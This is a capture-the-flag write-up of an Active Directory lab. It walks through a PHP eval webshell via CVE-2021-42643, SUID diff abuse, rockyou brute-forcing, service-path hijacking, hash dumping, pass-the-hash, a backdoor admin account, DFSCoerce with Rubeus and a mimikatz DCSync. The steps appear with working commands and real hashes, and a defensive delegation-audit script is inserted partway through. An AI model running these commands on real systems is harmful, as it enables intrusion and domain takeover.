春秋云镜 Delegation
# CVE-2021-42643 (writing a webshell)
POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1
Host: 39.99.145.25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=76k928kpbpau54uj05b06s920r; loginfalse74c6352c5a281ec5947783b8a186e225=1; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313
Referer: http://39.99.145.25/index.php?case=admin&act=login&admin_dir=admin&site=default
Content-Type: application/x-www-form-urlencoded
Content-Length: 49

sid=#data_d_.._d_.._d_.._d_1.php&slen=693&scontent=<?php @eval($_POST[bp]);?>

Connect to 1.php with AntSword (蚁剑); the password is bp.

The home directory contains a flag, but it cannot be read as the current user. Check whether any SUID binary allows privilege escalation:
find / -user root -perm -4000 -print 2>/dev/null
# Privilege escalation via diff
diff turns out to be SUID and can be used to escalate privileges.

# flag01
Use diff to read the flag:
diff --line-format=%L /dev/null /home/flag/flag01.txt

# fscan (172.22.4.36)
Upload fscan and run a scan directly.
web1 is 172.22.4.36.

A host named win19 shows up. Since flag01 hinted at win19\Adrian and also mentioned rockyou, this looks like a password brute-force, so continue scanning 172.22.4.45 with fscan.

Port 3389 (RDP) is open.

# Password brute-force with rockyou
Brute-force the password with rockyou:
proxychains4 -q crackmapexec smb 172.22.4.45 -u "Adrian" -p /usr/share/wordlists/rockyou.txt --local-auth
The password is obtained:
win19\Adrian babygirl1
Logging in directly through the proxy shows that the password has expired.

# rdesktop
The rdesktop command on Kali can connect without specifying a user, after which the password can be changed:
proxychains rdesktop 172.22.4.45

When I tried to change the password, I got an error.

Change the password directly from the command line instead.
Only after reading h0ny's writeup did I learn that logging in with the following command prompts you to change the password right away:
proxychains4 -q rdesktop 172.22.4.45 -u 'Adrian' -p 'babygirl1' -z

After logging in, there is a PrivescCheck folder on the desktop containing PrivesCheck_WIN19.html.

The scan report shows that the current user has permission to modify the registry path of a service that runs as SYSTEM:

Simply point the service binary at a malicious executable and start the service to obtain SYSTEM privileges on the host.
PS C:\Users\Adrian\Desktop> reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\Adrian\Desktop\windows.exe" /f
操作成功完成。
PS C:\Users\Adrian\Desktop> reg query "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /v ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\gupdate
ImagePath REG_EXPAND_SZ C:\Users\Adrian\Desktop\windows.exe

# Start the gupdate service
cmd /c "sc start gupdate"

Then use the usual vshell method with a bind (forward) connection to 172.22.4.45; the host comes online successfully.

But the session I got was not the Administrator user, so I could not read the flag.
Looking at 狗 and 猫's writeup, they get an admin session directly.
Their writeup says that after running the gupdate service there are three files to decrypt:
secretsdump.py LOCAL -system system -sam sam -security security

Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:21b11500d5834a2b9b3373564a0565f6 (this value may differ; the admin password hash should be the same)
# PTH (pass-the-hash) attack (SYSTEM)
Use the admin hash directly for pass-the-hash to get a shell:
proxychains python3 smbexec.py administrator@172.22.4.45 -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk
# flag02
type C:\Users\Administrator\flag\flag02.txt

# Create a new user
net user bp qwer1234! /add
net localgroup administrators bp /add
Created successfully. After logging in, drop the implant and connect directly with a bind connection; the session is finally Administrator.
# BloodHound
Run BloodHound collection (authenticating with the $MACHINE.ACC hash).

From the BloodHound output and the challenge name it is easy to guess that the next step is unconstrained delegation between WIN19 and DC01. Following the article 红队域渗透 NTLM Relay:强制认证方式总结 (a summary of forced-authentication methods for red-team domain penetration), use DFSCoerce to take the domain controller.
First log in to win19 with the newly created admin account, then run Rubeus with administrator privileges:
Rubeus.exe monitor /interval:1 /nowrap /targetuser:DC01$
Use the DFSCoerce exploitation tool to coerce the secondary domain controller into authenticating:
proxychains python3 dfscoerce.py -u win19$ -hashes "aad3b435b51404eeaad3b435b51404ee:21b11500d5834a2b9b3373564a0565f6" -d xiaorang.lab win19 172.22.4.7

We now have the base64-encoded TGT. Decode it locally and save it as DC01.kirbi:
echo '<base64 TGT from the Rubeus output>' | base64 -d > DC01.kirbi
Then upload mimikatz and use DCSync to obtain the domain controller hashes:
mimikatz.exe "kerberos::purge" "kerberos::ptt DC01.kirbi" "lsadump::dcsync /domain:xiaorang.lab /user:administrator" "exit"
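The chain above works because WIN19 is a non-DC host configured for unconstrained delegation, so any TGT it receives (here DC01$'s, after coercion) can be reused. As an added example that is not part of the original writeup, the audit below decodes the `userAccountControl` flags that a defender would query from AD and flags the accounts that make this possible; the account records are constructed sample data, not real domain output.

```python
# Added example: audit AD userAccountControl flags for risky delegation settings.
# Records would normally come from an LDAP export; the list below is constructed.

TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account
WORKSTATION_TRUST_ACCOUNT = 0x1000          # member server / workstation computer account

# Constructed sample records (names mirror the lab, values are illustrative).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000},       # DC, unconstrained is expected
    {"sAMAccountName": "WIN19$", "userAccountControl": 0x81000},      # member server, unconstrained: risky
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x1000},       # member server, no delegation
    {"sAMAccountName": "Administrator", "userAccountControl": 0x10200},  # normal account, not protected
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x1000200},   # protocol transition enabled
]


def audit_delegation(accounts):
    """Return (account, reason) pairs for delegation settings a defender should review."""
    findings = []
    for acct in accounts:
        name, uac = acct["sAMAccountName"], acct["userAccountControl"]
        is_dc = bool(uac & SERVER_TRUST_ACCOUNT)
        # Unconstrained delegation on anything but a DC lets that host replay every
        # forwardable TGT sent to it, including a DC's after forced authentication.
        if uac & TRUSTED_FOR_DELEGATION and not is_dc:
            findings.append((name, "unconstrained delegation on non-DC host"))
        # Protocol transition lets the account obtain service tickets for any user.
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            findings.append((name, "constrained delegation with protocol transition"))
    return findings


def unprotected_privileged(accounts, privileged=("Administrator", "krbtgt")):
    """Privileged accounts whose tickets may still be delegated (NOT_DELEGATED unset)."""
    return [
        acct["sAMAccountName"]
        for acct in accounts
        if acct["sAMAccountName"] in privileged
        and not (acct["userAccountControl"] & NOT_DELEGATED)
    ]


if __name__ == "__main__":
    for name, reason in audit_delegation(SAMPLE_ACCOUNTS):
        print(f"{name}: {reason}")
    print("privileged accounts without NOT_DELEGATED:", unprotected_privileged(SAMPLE_ACCOUNTS))
```

Remediation for the findings is to clear the unconstrained-delegation flag on member servers, and to set "account is sensitive and cannot be delegated" (or Protected Users membership) on privileged accounts.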
# psexec.py
With the domain controller hashes obtained, finally move laterally to the remaining machines in the domain.
On Kali the scripts are in /home/baonoob/tools/Impacket/examples.
# flag03
proxychains python3 psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/Administrator@172.22.4.19
type C:\Users\Administrator\flag\flag03.txt

# flag04
proxychains python3 psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 Administrator@172.22.4.7
type C:\Users\Administrator\flag\flag04.txt
